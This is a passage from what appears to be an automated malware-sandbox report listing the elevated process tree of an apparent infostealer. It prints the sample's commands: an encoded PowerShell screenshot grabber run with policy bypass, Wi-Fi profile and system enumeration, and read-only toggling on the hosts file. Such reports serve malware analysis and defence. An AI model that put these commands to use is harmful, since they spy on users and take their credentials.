                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                            Start time:09:32:32
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                            Imagebase:0x7ff64baf0000
                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                            Imagebase:0x7ff768620000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff76da80000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:netsh wlan show profile
                                                                                                                                                                                                                            Imagebase:0x7ff658ef0000
                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:74
                                                                                                                                                                                                                            Start time:09:32:33
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                            Start time:09:32:34
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                            Start time:09:32:34
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                            Start time:09:32:34
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                            Start time:09:32:34
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                            Start time:09:32:34
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff76da80000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff62c010000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                            Imagebase:0x7ff62c010000
                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                            Start time:09:32:35
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
